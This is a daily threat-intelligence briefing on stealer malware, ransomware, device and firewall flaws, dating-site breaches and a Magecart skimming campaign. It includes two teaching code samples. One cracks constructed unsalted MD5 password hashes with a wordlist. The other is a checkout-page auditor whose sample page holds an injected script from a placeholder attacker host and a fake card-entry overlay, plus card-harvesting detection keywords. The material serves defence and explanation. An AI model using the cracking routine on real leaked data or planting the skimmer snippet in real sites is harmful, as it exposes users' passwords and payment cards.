Cyware Daily Threat Intelligence

Daily Threat Briefing • Apr 28, 2023
Abuse of Telegram has become the norm in cybercrime. Security researchers recently uncovered an unidentified group selling a macOS malware called Atomic, aka AMOS, through the platform. Worse, it lets buyers dig deeper into the target system and targets data held in more than 50 cryptocurrency browser extensions. Shopping online isn't always as smooth as it sounds: Malwarebytes Labs took the wraps off an ongoing Magecart campaign that deploys a skimmer known as Kritec to steal credit card details while the user shops on the compromised portal.
The U.S. government issued an alert to healthcare providers and laboratory staff about several critical bugs in Illumina medical devices that could potentially expose devices to remote hacking. Illumina's products are widely used in the healthcare industry globally for DNA sequencing.
Two dating websites suffer breach
Troy Hunt, the founder of Have I Been Pwned, disclosed that cybercriminals breached two dating websites, CityJerks and TruckerSucker, and stole a range of users' personal details, including email addresses, passwords, and direct messages. The passwords were reportedly stored using a weak hashing algorithm, leaving them open to offline cracking. The attackers claim to have obtained data on around 8,000 and 77,000 users, respectively, from the two sites.
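The reason a weak, unsalted hash is "decipherable" is that an attacker cracks the whole dump with one pass over a wordlist. The following is an added illustration, not data or code from the breaches or from Have I Been Pwned: the user records, passwords and wordlist are constructed, and the choice of unsalted MD5 for the weak scheme is an assumption made for the demonstration. The same dictionary attack is then run against per-user salted scrypt to show why the cost changes.

```python
import hashlib
import secrets

# Constructed sample breach dump: user -> unsalted MD5 of the password.
# Not real records; MD5 is assumed here as a typical fast, unsalted scheme.
WEAK_DUMP = {
    "alice@example.com": hashlib.md5(b"password1").hexdigest(),
    "bob@example.com":   hashlib.md5(b"letmein").hexdigest(),
    "carol@example.com": hashlib.md5(b"Tr0ub4dor&3").hexdigest(),
}

# Constructed wordlist standing in for a real cracking dictionary.
WORDLIST = ["123456", "password", "password1", "letmein", "qwerty", "trucker"]


def crack_unsalted(dump, wordlist):
    """Hash the wordlist once, then look every leaked hash up in the table.
    Cost is len(wordlist) cheap hashes regardless of how many users leaked,
    and every user sharing a password falls at the same time."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in dump.items() if h in table}


def hash_strong(password, salt=None):
    """Per-user random salt plus a memory-hard KDF (scrypt, 16 MiB per call).
    A precomputed table is useless because each user's salt differs."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return salt.hex() + "$" + digest.hex()


def verify_strong(password, stored):
    salt_hex, _ = stored.split("$")
    candidate = hash_strong(password, bytes.fromhex(salt_hex))
    return secrets.compare_digest(candidate, stored)


def build_strong_dump(plaintexts):
    """Constructed 'good practice' dump: the same passwords, stored with scrypt."""
    return {user: hash_strong(pw) for user, pw in plaintexts.items()}


def crack_strong(dump, wordlist):
    """Same dictionary attack against salted scrypt. Returns what was found and
    how many KDF evaluations it took: len(dump) * len(wordlist) in the worst
    case, each one far slower than an MD5, with nothing shared between users."""
    found, work = {}, 0
    for user, stored in dump.items():
        for w in wordlist:
            work += 1
            if verify_strong(w, stored):
                found[user] = w
                break
    return found, work


if __name__ == "__main__":
    print("unsalted MD5:", crack_unsalted(WEAK_DUMP, WORDLIST))
    strong = build_strong_dump({"alice@example.com": "password1",
                                "bob@example.com": "letmein",
                                "carol@example.com": "Tr0ub4dor&3"})
    print("salted scrypt:", crack_strong(strong, WORDLIST))
```

Both schemes give up the two dictionary passwords, which is the other half of the lesson: a slow salted KDF buys time per guess, it does not rescue "password1". What it removes is the bulk discount, since the attacker can no longer crack 77,000 accounts for the price of one wordlist pass.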
New macOS threat against crypto users
Cybercriminals are abusing private Telegram channels to sell a new macOS malware variant that targets data held in more than 50 cryptocurrency browser extensions. Dubbed Atomic, the malware is sold with a ready-to-use web panel for victim management, a cryptocurrency checker, a MetaMask brute-forcer, a DMG installer, and delivery of stolen logs to Telegram.
New ransomware family with essence of Paradise
Researchers at Trend Micro spotted a ransomware variant called Rapture that takes a minimalistic approach and leaves only a small footprint on the victim system. The attackers packed the ransomware with the commercial packer Themida, which complicates analysis. An RSA key configuration file used by the attackers resembled the one used by the Paradise ransomware.
Zyxel patches RCE flaw
Networking equipment maker Zyxel fixed a critical vulnerability, tracked as CVE-2023-28771, in its firewall devices. TRAPA Security, which reported the flaw, explained that improper error message handling in some firewall firmware versions could allow an unauthenticated remote attacker to execute OS commands by sending crafted packets to an affected device. The issue carries a CVSS score of 9.8.
Federal agencies warn of Illumina bug
CISA and the FDA have issued public notifications that the Universal Copy Service (UCS) component in several of Illumina's genetic sequencing instruments contains vulnerabilities. Although no attacks have been reported so far, the FDA stated that an attacker could exploit them to take control of a device remotely or alter its configuration, settings, software, or data, including data on the customer's network.
Skimming campaign uses fake ‘modal’
A Magecart attacker compromised the website of a Parisian travel accessory store running the PrestaShop CMS. Researchers analyzing the incident found the Kritec skimmer injected into the site, loading malicious scripts that hijack the checkout process. On the checkout page, the attackers displayed a fake 'modal', a page element rendered in front of the genuine, still-active page, to trick shoppers into entering their payment card details, which the skimmer then steals.
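A shop owner's first question after reading this is how to notice such an injection before customers do. One practical check is to audit the scripts a checkout page actually loads against the hosts it is supposed to load from, and to flag inline scripts that build a fixed overlay containing card fields. The following is an added example and not code from Malwarebytes or from the compromised store: the checkout HTML is constructed, the allowed hosts (`shop.example.test`, `cdn.example.test`) and the attacker host (`cdn.example-skimmer.test`) are placeholders, and the keyword list is a heuristic, not a signature for Kritec.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this shop legitimately loads scripts from (deployment-specific; assumed).
ALLOWED_SCRIPT_HOSTS = {"shop.example.test", "cdn.example.test"}

# Heuristic tokens for an inline script that draws a full-page overlay and
# harvests card data. Matched case-insensitively against the script body.
SUSPICIOUS_TOKENS = ("cardnumber", "card_number", "cvv", "cvc", "expiry",
                     "position:fixed", "position: fixed", "z-index")

# Constructed checkout page, not the real compromised site: two first-party
# scripts, an injected loader from an attacker host, and an inline fake-modal builder.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<script src="/themes/classic/assets/js/theme.js"></script>
<script src="https://cdn.example.test/modules/ps_checkout.js"></script>
<script src="//cdn.example-skimmer.test/kr.js"></script>
<script>
  var m = document.createElement("div");
  m.style = "position:fixed;top:0;left:0;width:100%;height:100%;z-index:99999";
  m.innerHTML = '<form><input name="cardnumber"><input name="cvv"></form>';
  document.body.appendChild(m);
</script>
</body></html>
"""


class ScriptCollector(HTMLParser):
    """Collects every <script> on the page: its src (if any) and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []          # [{"src": str | None, "body": str}, ...]
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})
            self._in_script = True

    def handle_data(self, data):
        # HTMLParser treats <script> content as CDATA, so the JS arrives here verbatim.
        if self._in_script:
            self.scripts[-1]["body"] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def audit_checkout_page(html, page_host, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return (kind, detail) findings: external scripts from hosts outside the
    allowlist, and inline scripts that look like a card-harvesting overlay."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for script in parser.scripts:
        if script["src"]:
            # Relative or protocol-relative URLs are resolved against the page host.
            host = urlparse(script["src"]).hostname or page_host
            if host not in allowed_hosts:
                findings.append(("third-party-script", script["src"]))
        else:
            body = script["body"].lower()
            hits = [t for t in SUSPICIOUS_TOKENS if t in body]
            if hits:
                findings.append(("inline-overlay-script", ", ".join(hits)))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_checkout_page(SAMPLE_CHECKOUT_HTML, "shop.example.test"):
        print(f"{kind}: {detail}")
```

Run against a fresh fetch of the live checkout page on a schedule, this catches the two things a skimmer injection needs: a new script origin, or new inline code that paints over the real form. The allowlist is the important part; once it exists, the same set of hosts belongs in a `Content-Security-Policy` `script-src` directive so the browser refuses the injected loader outright instead of a cron job noticing it later.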